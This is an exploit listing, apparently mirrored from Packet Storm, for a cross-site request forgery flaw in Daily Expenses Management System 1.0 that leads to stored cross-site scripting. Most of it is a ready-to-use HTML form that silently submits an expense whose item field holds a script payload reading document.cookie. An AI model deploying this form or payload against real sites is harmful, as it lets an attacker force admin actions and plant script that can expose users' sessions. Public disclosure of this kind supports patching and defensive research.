Exploit for Daily Expenses Management System 1.0 Cross SIte Request Forgery

## https://sploitus.com/exploit?id=PACKETSTORM:158775
# Exploit Title: Daily Expenses Management System 1.0 - Cross-Site Request Forgery  
# Date: 2020-8-5  
# Exploit Author: Edo Maland  
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html  
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html  
# Version: 1.0  
# Tested on: XAMPP / Windows 10  
  
# Vulnerability Details  
# Description : Cross-Site Request Forgery Lead to Persistent Cross-Site Scripting (CSRF to XSS Stored)  
  
# POC  
  
An attacker can force the admin to add a product  
  
URL : https://example.com/dets/manage-expense.php  
- Feature : Add Expense  
  
  
# CSRF HTML  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://example.com/dets/add-expense.php" method="POST">  
<input type="hidden" name="dateexpense" value="2020-08-12" />  
<input type="hidden" name="item" value="<img src=xss onerror=alert(document.cookie)>" />  
<input type="hidden" name="costitem" value="1337" />  
<input type="hidden" name="submit" value="" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>